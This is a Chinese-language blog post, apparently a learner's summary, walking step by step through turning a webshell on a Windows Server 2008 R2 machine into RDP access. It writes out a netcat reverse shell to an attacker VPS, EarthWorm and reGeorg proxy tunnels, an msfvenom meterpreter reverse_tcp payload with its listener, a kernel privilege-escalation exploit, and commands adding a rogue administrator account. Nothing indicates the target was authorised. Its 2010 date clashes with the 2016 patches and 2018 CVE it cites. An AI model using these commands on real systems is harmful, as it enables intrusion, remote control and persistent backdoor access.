Home未分类从webshell到3389

从webshell到3389

2010 年 8 月 10 日
之前玩过一下linux下的提权,前段时间在上课的时候看了亮神的文章,感觉渗透还是不应该只停留在web层面。虽然说连WEB层面的东西都还没搞懂,但是还是想拓宽一下自己的攻击思路。当拿到了一个webshell之后,还能干什么呢?之前挖SRC,运气好也撞到过一个RCE,但是这些都只能停留在拿了shell之后,就不能再测下去了,后渗透这块,完全不清楚,虽然这次还是没有接触到域渗透,但是学了一些内网与代理之类的知识,还是做个小结为好。

正文

一些信息

首先
拿到了一台服务器的webshell,这台机的状况

  • 只有一个内网IP
  • webshell权限 nt authority\network service(非system)可以执行命令
  • Microsoft Windows Server 2008 R2
  • systeminfo 补丁到 [246]: KB4034733(补丁最后时间大概在2016年左右)
  • 不存在域

由于在内网里面,很多操作需要用到代理。

内网端口转发:阿烨师傅的文章 https://www.jianshu.com/p/735e8f1746f0

我个人使用了

ew

我尝试了用连接 本机-vps-webshell
ps:如果需要交互可以上传一个nc和cmd 反弹cmd

vul: nc -e cmd.exe yourvps 2333
vps: nc -lvvp 2333

一般ew是会被杀,暂时没有了解免杀方面的知识

vul: ew -s rssocks -d yourvps -e 2333
vps: ./ew_for_linux64 -s rcsocks -l 1080 -e 2333

自己的电脑可以直接上个代理

地址: yourvps 2333

reGeorg与Proxifier

详细可以看 https://xz.aliyun.com/t/228

上传tunnel.aspx
访问显示

Georg says, 'All seems fine

运行

python reGeorgSocksProxy.py -p 9999 -u http://xxxxxx.com/tunnel.asp

设置代理服务器为9999
设置好代理之后就可以3389链接了
连接地址:vul的内网ip

上传meterpreter

渗透自然少不了metaspolit
在拿了webshell之后,上次一个meterpreter上去会方便很多操作,
可以参考亮神的Micro8

https://micro8.gitbook.io/micro8/contents-1/1-10/10msfvenom-chang-yong-sheng-cheng-payload-ming-ling

我在腾讯云上生成好像在运行的时候报错了,所以我直接在我的windows上生成了

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=yourvps LPORT=2334 -f exe > payload.exe

在vps上

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost yourvps
set lport 2334
exploit

获取到会话

关于meterpreter的操作可以参考先知社区的 https://xz.aliyun.com/t/2536

提权

meterpreter的某些操作需要足够的权限,以及我并没有一个可以登入3389的账户,webshell本身权限也不够,所以提权是必不可少的。
同样的亮神的第一课和第二课都是关于提权的。
windows下的提权

对外公开的exp: https://github.com/SecWiki/windows-kernel-exploits

我选择了CVE-2018-8639来提权

https://github.com/ze0r/CVE-2018-8639-exp

exp.exe
再whoami,权限变成了

nt authority\system

添加一个账户并且给他管理员

net user test password /add
net localgroup administrators test /add

reGeorg与Proxifier配合使用登入3389

Related Posts

About The Author

bjmayor

程序员,码农,php,python,ios,android,go,产品经理,创业。